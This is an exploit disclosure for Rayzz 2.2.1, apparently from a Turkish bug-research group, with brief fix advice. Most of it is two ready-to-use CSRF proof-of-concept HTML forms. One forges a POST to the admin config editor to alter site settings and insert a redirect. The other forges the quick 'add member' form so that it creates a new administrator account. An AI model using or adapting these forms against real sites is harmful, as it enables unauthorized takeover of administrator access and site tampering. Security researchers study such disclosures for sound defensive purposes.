< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rayzz 2.2.1

# Vulnerability Type : CSRF / XSRF (forged POST to the admin config editor and to the quick "add member" form, allowing an attacker to alter site configuration and add a new admin)

# Impact : Yeni admin eklenebilir ..! (a logged-in administrator who loads an attacker-controlled page can be made to create a new admin account and change site settings without intending to)

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! — Add a per-session, unpredictable anti-CSRF token to the admin forms and have editConfig.php and memberAdd.php reject any POST whose token does not match the one stored server-side for that session.

# Demo : http://demo.agriya.com/rayzz/

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

[yönlendirme kodu ekleme — PoC 1: edit site configuration (the form below posts to admin/editConfig.php; "YONLENDIRME KODU" in site_title marks where the attacker's payload, e.g. a redirect, would be placed)]

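<!--
  CSRF proof-of-concept #1: replays the admin "edit config" form against the
  target (action = admin/editConfig.php). "hedefsite.com" (target site) and
  "scriptyolu" (script path) are placeholders for the target host and install
  path.
  Fix relative to the original listing: every attribute value is quoted.
  Unquoted values containing spaces (site_title, keywords, description, the
  submit button label) were split into separate attributes by the HTML parser,
  so those fields were posted truncated and with stray attribute names.
  NOTE(review): the clsCheckRadio fields (rewrite, static_page_editor,
  external_url_open_in_new_window, ...) look like checkboxes in the real admin
  form. `checked` has no effect on type="hidden"; each of these inputs posts an
  empty string regardless. Confirm the value the real checkbox posts when ticked
  and set value="..." on the ones that should be enabled.
  The request only succeeds when submitted by a browser that holds an
  authenticated admin session; as written the form needs a manual click.
-->
<form name="form_config" id="selFormConfig" method="post" action="http://hedefsite.com/scriptyolu/admin/editConfig.php" autocomplete="off">
<div id="selConfigSection">
<input type="hidden" class="clsCheckRadio" name="rewrite" id="rewrite" tabindex="1000" />
<input type="hidden" class="clsTextBox" name="site_name" id="site_name" value="Rayzz.net" tabindex="1005" />
<!-- attacker-controlled content goes here (placeholder label in the original PoC) -->
<input type="hidden" class="clsTextBox" name="site_title" id="site_title" value="YONLENDIRME KODU" tabindex="1010" />
<input type="hidden" class="clsTextBox" name="noreply_name" id="noreply_name" value="Noreply" tabindex="1015" />
<input type="hidden" class="clsTextBox" name="noreply_email" id="noreply_email" value="[email protected]" tabindex="1020" />
<input type="hidden" class="clsTextBox" name="contactus_email" id="contactus_email" value="[email protected]" tabindex="1025" />
<input type="hidden" class="clsTextBox" name="index_page" id="index_page" value="20" tabindex="1030" />
<input type="hidden" class="clsTextBox" name="keywords" id="keywords" value="rayzz, rayzz.net, online social networking, video hosting, photo hosting, view, upload and share videos and photos" tabindex="1035" />
<input type="hidden" class="clsTextBox" name="description" id="description" value="rayzz.net is a free online social networking site that also provides a free video and photo hosting service allowing users to view, upload, and share videos and photos." tabindex="1040" />
<input type="hidden" class="clsTextBox" name="numpg" id="numpg" value="16" tabindex="1045" />
<input type="hidden" class="clsCheckRadio" name="static_page_editor" id="static_page_editor" tabindex="1050" />
<input type="hidden" class="clsCheckRadio" name="external_url_open_in_new_window" id="external_url_open_in_new_window" tabindex="1055" checked />
<input type="hidden" class="clsCheckRadio" name="allow_all_post_article" id="allow_all_post_article" tabindex="1060" checked />
<input type="hidden" class="clsCheckRadio" name="add_default_friend" id="add_default_friend" tabindex="1065" checked />
<input type="hidden" class="clsTextBox" name="default_friend_name" id="default_friend_name" value="webmaster" tabindex="1070" />
<input type="hidden" class="clsCheckRadio" name="signup_auto_activate" id="signup_auto_activate" tabindex="1075" />
<input type="hidden" class="clsCheckRadio" name="email_using_to_login" id="email_using_to_login" tabindex="1080" />
<input type="hidden" class="clsCheckRadio" name="default_friend_mail" id="default_friend_mail" tabindex="1085" checked />
<input type="hidden" class="clsTextBox" name="inactive_users_delete_period" id="inactive_users_delete_period" value="0" tabindex="1090" />
<input type="hidden" class="clsTextBox" name="captcha_method" id="captcha_method" value="honeypot" tabindex="1095" />
<!-- "BUTON ADI" = "button label" placeholder; the victim must click this -->
<input type="submit" class="clsSubmitButton" name="edit_submit" id="edit_submit" value="BUTON ADI" tabindex="1100" />
</div>
</form>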

[Yeni admin ekleme — PoC 2: create a new admin account via admin/memberAdd.php?mode=quick with usr_access=Admin]

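<!--
  CSRF proof-of-concept #2: replays the admin "quick add member" form
  (action = admin/memberAdd.php?mode=quick) with usr_access fixed to "Admin",
  so a forged submission creates a new administrator account.
  "hedefsite.com" / "scriptyolu" are placeholders for the target host and
  install path; the visible field values are Turkish placeholders
  (Kullanici adi = username, Sifre = password, adiniz/soyadiniz = first/last
  name, websiteniz = your website, sehiriniz = your city, postakodu = postal
  code) that the attacker replaces with the account details they want.
  Fix relative to the original listing: every attribute value is quoted.
  Unquoted values containing spaces (user_name, the submit button label) were
  split into separate attributes, so those fields were posted truncated.
  The fields are ordinary text inputs, so the PoC relies on the victim (an
  authenticated admin) clicking the submit button; password is sent as plain
  text in a type="text" field, which is fine for a PoC but not for reuse.
-->
<form name="selFormEditProfile" id="selFormEditProfile" method="post" action="http://hedefsite.com/scriptyolu/admin/memberAdd.php?mode=quick" autocomplete="on">
<input type="text" class="clsTextBox" name="user_name" id="user_name" tabindex="205" value="Kullanici adi" />
<input type="text" class="clsTextBox" name="email" id="email" tabindex="210" value="e mail" />
<input type="text" class="clsTextBox" name="password" id="password" tabindex="215" value="Sifre" />
<!-- the only option offered is Admin: the forged account is created with admin access -->
<select name="usr_access" id="usr_access" tabindex="220">
<option value="Admin">Admin</option>
</select>
<input type="text" class="clsTextBox" name="first_name" id="first_name" tabindex="225" value="adiniz" />
<input type="text" class="clsTextBox" name="last_name" id="last_name" tabindex="230" value="soyadiniz" />
<select name="sex" id="sex" tabindex="235">
<option value="male">Male</option>
<option value="female">Female</option>
</select>
<select name="dob_date" id="dob_date" tabindex="240">
<option value="1">1</option>
</select>
<!-- dob_month / dob_year are posted as empty strings (option value="") -->
<select name="dob_month" id="dob_month" tabindex="245">
<option value="">ay</option>
</select>
<select name="dob_year" id="dob_year" tabindex="250">
<option value="">1905</option>
</select>
<input type="text" class="clsTextBox" name="hometown" id="hometown" tabindex="255" value="websiteniz" />
<input type="text" class="clsTextBox" name="city" id="city" tabindex="260" value="sehiriniz" />
<input type="text" class="clsTextBox" name="postal_code" id="postal_code" tabindex="265" value="postakodu" />
<select name="country" id="country" tabindex="270">
<option value="" selected="selected">Choose</option>
<option value="TR">Turkey</option>
</select>
<input type="submit" class="clsSubmitButton" name="editprofile_submit" id="editprofile_submit" tabindex="275" value="create Member" />
</form>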

< -- bug code end of -- >